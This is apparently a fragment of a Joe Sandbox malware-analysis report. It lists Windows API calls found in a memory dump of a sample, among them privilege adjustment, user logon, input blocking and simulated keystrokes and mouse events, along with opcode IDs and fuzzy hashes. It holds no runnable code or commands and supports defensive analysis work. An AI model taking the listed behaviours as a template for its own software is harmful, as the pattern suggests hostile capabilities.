                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \Q
                                                        • API String ID: 4104443479-1011046347
                                                        • Opcode ID: 309d6190b9dee65f79a2ca8ad1a8ae1d2a73e64048748adedb84d06b4aecff05
                                                        • Instruction ID: 8bfeae7c7fffcf88794b36efb9ddfbe1e463ad4602c02c859820e1ea49e1b181
                                                        • Opcode Fuzzy Hash: 309d6190b9dee65f79a2ca8ad1a8ae1d2a73e64048748adedb84d06b4aecff05
                                                        • Instruction Fuzzy Hash: 04A22970A04219CFCB24CF58D980BEDB7B1BF48314F2591A9D899BB391D7359E82DB90
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E8E20D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E8E267
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E8E2B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: aeb02363f64775531be09531b5b6aeb4d15f983db27c5b9135190827cda43323
                                                        • Instruction ID: ee7d808cbed485a2363cc3ab9448306a4f237e960a7e9a1af2cbbe1800210d76
                                                        • Opcode Fuzzy Hash: aeb02363f64775531be09531b5b6aeb4d15f983db27c5b9135190827cda43323
                                                        • Instruction Fuzzy Hash: 65211B35A00118EFDB00EFA5D885EADBBF8FF89314F1484A9E949A7251DB319915CB50
                                                        APIs
                                                          • Part of subcall function 00E5F4EA: std::exception::exception.LIBCMT ref: 00E5F51E
                                                          • Part of subcall function 00E5F4EA: __CxxThrowException@8.LIBCMT ref: 00E5F533
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E7B180
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E7B1AD
                                                        • GetLastError.KERNEL32 ref: 00E7B1BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 1552330dcc0a16c2ef79d6dd584b78280aa007a6eb81cf98ca39b78d94622d10
                                                        • Instruction ID: bc3e2d5faa4332b85aa1820c58cbe1c1f9227afb141a86b7705d4670a6e89ad3
                                                        • Opcode Fuzzy Hash: 1552330dcc0a16c2ef79d6dd584b78280aa007a6eb81cf98ca39b78d94622d10
                                                        • Instruction Fuzzy Hash: 3611BFB1404204AFE7189F58DC86D2BB7EDFB44311B20893EE45AA3240DB71FC458A60
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E866AF
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00E866EC
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E866F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 838ef7f831f379e71f0b78ec8843a648d848307f422b5bfedb9ac49166c51420
                                                        • Instruction ID: 8ce2d86ae7b195b5db88bb0a188a3923de158699c5285d003a5e7a3a571ed478
                                                        • Opcode Fuzzy Hash: 838ef7f831f379e71f0b78ec8843a648d848307f422b5bfedb9ac49166c51420
                                                        • Instruction Fuzzy Hash: 0A11A5B1901228BFE7109BA8DC45FAF77BCEB04718F004566F905F7191D2759E0587E1
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E87223
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E8723A
                                                        • FreeSid.ADVAPI32(?), ref: 00E8724A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 2e092184a5a5b0966f9283a0eaa6542f66c457f33c9ee52b1589dbdfb9939e51
                                                        • Instruction ID: d15227c1502f11a3aa49af6e2c882f695fdbfd2d412ef08760b0e75a2b397839
                                                        • Opcode Fuzzy Hash: 2e092184a5a5b0966f9283a0eaa6542f66c457f33c9ee52b1589dbdfb9939e51
                                                        • Instruction Fuzzy Hash: 41F06275904208BFDF00DFE8CC8AEEDBBB9FF08201F104479A502E2191E23196059B10
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E8F599
                                                        • FindClose.KERNEL32(00000000), ref: 00E8F5C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 9fe0d4e5ae0842cd15f40ee6c8f0f70e75e8897a1c50f875529e867202b51970
                                                        • Instruction ID: fbfe076daf3836f4192484039406f3c3a813bf9f2ea327231d8f487795efcf93
                                                        • Opcode Fuzzy Hash: 9fe0d4e5ae0842cd15f40ee6c8f0f70e75e8897a1c50f875529e867202b51970
                                                        • Instruction Fuzzy Hash: 7D11C4316046009FD710EF29D845A2EF3E8FF85325F04892EF9AAE7291CB30AD058B81
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E9BE6A,?,?,00000000,?), ref: 00E8CEA7
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E9BE6A,?,?,00000000,?), ref: 00E8CEB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 1bc68ea0bd39408686cdb056fd5900094c88368379ccbfe39f3fb174deb54ec1
                                                        • Instruction ID: b44cdd366a6b4967a84e494a491984149d50307ee7fee7efbab0dea1f95ee022
                                                        • Opcode Fuzzy Hash: 1bc68ea0bd39408686cdb056fd5900094c88368379ccbfe39f3fb174deb54ec1
                                                        • Instruction Fuzzy Hash: BBF08231104229EBDB10ABA4EC49FFA776DBF093A1F004166F919F6191D7309A44CBA1
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E84153
                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E84166
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: a52b930aa94e5e3228b095421867e7081d17547a7cf69d19488baddcc2e8810b
                                                        • Instruction ID: 10cd3f69881e3115b7d71da831241859b93d9705a995a61154d6cfcfacf2fcaf
                                                        • Opcode Fuzzy Hash: a52b930aa94e5e3228b095421867e7081d17547a7cf69d19488baddcc2e8810b
                                                        • Instruction Fuzzy Hash: 54F06D7090424EAFDB059FA1CC09BFE7BB0EF00305F008019F969A6192D77A86169FA0
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E7ACC0), ref: 00E7AB99
                                                        • CloseHandle.KERNEL32(?,?,00E7ACC0), ref: 00E7ABAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 6323dd26a3bbd482b514aaacb3eb2df5936928c34b20ed7108523fd55cf81e49
                                                        • Instruction ID: d69a1cabb340a18def9f2849b05255062918e1034ab06b2e85d7ccdbdf4a3b6a
                                                        • Opcode Fuzzy Hash: 6323dd26a3bbd482b514aaacb3eb2df5936928c34b20ed7108523fd55cf81e49
                                                        • Instruction Fuzzy Hash: BEE0E671004510AFE7252F55EC09D77B7E9EF443227108839F85991470D763AC95DB50
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00E66DB3,-0000031A,?,?,00000001), ref: 00E681B1
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E681BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 56a7352596538fe6497682aa809b38f8fb99df8ccf9879a15ae0a15d5345bf74
                                                        • Instruction ID: 12bb69c12432ceb88c0e0503f67f25f6155bffb55f7b1244e49ffeb445c016a0
                                                        • Opcode Fuzzy Hash: 56a7352596538fe6497682aa809b38f8fb99df8ccf9879a15ae0a15d5345bf74
                                                        • Instruction Fuzzy Hash: D3B09231048648AFDB002BAAEC09F587F68EB48662F014031F60D540618B7354268A92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0f95eb36ea7dea92530a052821a1bb78c4c8dcf94ddc195f96b36ec7b04c647
                                                        • Instruction ID: 9940788aa434e01eee89e534d7a2421ea5764a74d2df4fd42ced8e7cb8ba96fb
                                                        • Opcode Fuzzy Hash: e0f95eb36ea7dea92530a052821a1bb78c4c8dcf94ddc195f96b36ec7b04c647
                                                        • Instruction Fuzzy Hash: E5324721E69F414DD7279635EC22335A388EFB73C4F55E73BE819B5AA6EB29C4834100
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID:
                                                        • API String ID: 674341424-0
                                                        • Opcode ID: 8dcf004bc2c4e4d35d5ebbd94a23a81d18f05353c320dd8b3526f998523a3ef9
                                                        • Instruction ID: dccfd9dc198c41ac0607cc1af8bffe00d1de628e540453956ca93e99c1cd26c2
                                                        • Opcode Fuzzy Hash: 8dcf004bc2c4e4d35d5ebbd94a23a81d18f05353c320dd8b3526f998523a3ef9
                                                        • Instruction Fuzzy Hash: C32288716083019FD724DF24D891BABB7E4EF84314F10691DF99ABB292DB71E944CB82
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17981eadd9d2d146fe11a90f9f6ebba2675ce0d5c6c97130b0d55c9567cea745
                                                        • Instruction ID: 167681602b81d3cf9105795294d3c25f2bdde10e295819bf731755e34ebd3fe4
                                                        • Opcode Fuzzy Hash: 17981eadd9d2d146fe11a90f9f6ebba2675ce0d5c6c97130b0d55c9567cea745
                                                        • Instruction Fuzzy Hash: 03B10321D2AF414DD323963A9831336B75CAFBB2D6F91D71BFC2A74D62EB2185874180
                                                        APIs
                                                        • __time64.LIBCMT ref: 00E8B6DF
                                                          • Part of subcall function 00E6344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E8BDC3,00000000,?,?,?,?,00E8BF70,00000000,?), ref: 00E63453
                                                          • Part of subcall function 00E6344A: __aulldiv.LIBCMT ref: 00E63473
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 509a9d9188951ad445fa74549ab2854c22a863b6a9ed471239a6f7492587b2c2
                                                        • Instruction ID: 7f4802cdf50b73b1bc3a1daf8149441780ceddb562a855095fe311f9b359f3c7
                                                        • Opcode Fuzzy Hash: 509a9d9188951ad445fa74549ab2854c22a863b6a9ed471239a6f7492587b2c2
                                                        • Instruction Fuzzy Hash: 2D21AF726346108BC729CF38C891A92B7E5EB95310B248E7DE0E9CB2C0CB74BA05DB54
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00E96ACA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: ab3c635aff21978eabe55371443b725c792ec0d164019217223f79841af1405b
                                                        • Instruction ID: 96659855d1e1d4a86de8422046a027e59fbd0f1617526562cfefd98f4d51917b
                                                        • Opcode Fuzzy Hash: ab3c635aff21978eabe55371443b725c792ec0d164019217223f79841af1405b
                                                        • Instruction Fuzzy Hash: 58E012352042046FC700EB99D804D96B7ECAFA4751B04982BF945E7251DAB5E8048B90
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E8750A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 49485688b11aeef7b8621f63bc3d5855ff7529e38f48a17e5b0c1f8f6dc1b083
                                                        • Instruction ID: f8afeb1d64c1202bbcdbdb405fdd3b70ca5370db467a09cdf342a6d90f624f51
                                                        • Opcode Fuzzy Hash: 49485688b11aeef7b8621f63bc3d5855ff7529e38f48a17e5b0c1f8f6dc1b083
                                                        • Instruction Fuzzy Hash: 51D09EA416C60579ED1927249C1BFB71508F300785FF4655976AFF90C0E8D5DD45E231
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E7AD3E), ref: 00E7B124
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 481ddbf39902282510167a1bfe840e72d085383b88661b96a1401d2c8a30dc84
                                                        • Instruction ID: 47d05af52554897b3ca8a8fc9f6dc589bba6c122722bdc52b936c88f9f960988
                                                        • Opcode Fuzzy Hash: 481ddbf39902282510167a1bfe840e72d085383b88661b96a1401d2c8a30dc84
                                                        • Instruction Fuzzy Hash: 1CD09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448521FA15D50A1C676D536AB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 724239e1c3736091416448eefec8722204523bc78ad7bc94f6c2fba6f0e31f8d
                                                        • Instruction ID: 7866dc8dd7f8874665302c6d4719882fc69363a9d3271cb4f135d3d9008719fd
                                                        • Opcode Fuzzy Hash: 724239e1c3736091416448eefec8722204523bc78ad7bc94f6c2fba6f0e31f8d
                                                        • Instruction Fuzzy Hash: 6AC04CB1404109DFCB51CBC4CD44DEFBBBCAB04301F1450A1A105F1110D7719B459F72
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E6818F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 9d8e45e6f22ca83b7d0ebdd1e07375815b84e12ae833513211fd27b46e00d484
                                                        • Instruction ID: c1102070b69b0a095c493203012b91e9ca6ee8ee4a893543377358e4e92064ab
                                                        • Opcode Fuzzy Hash: 9d8e45e6f22ca83b7d0ebdd1e07375815b84e12ae833513211fd27b46e00d484
                                                        • Instruction Fuzzy Hash: CAA0113000820CAB8F002B8AEC088883F2CEB002A0B000032F80C000208B23A8228A82
                                                        Memory Dump Source
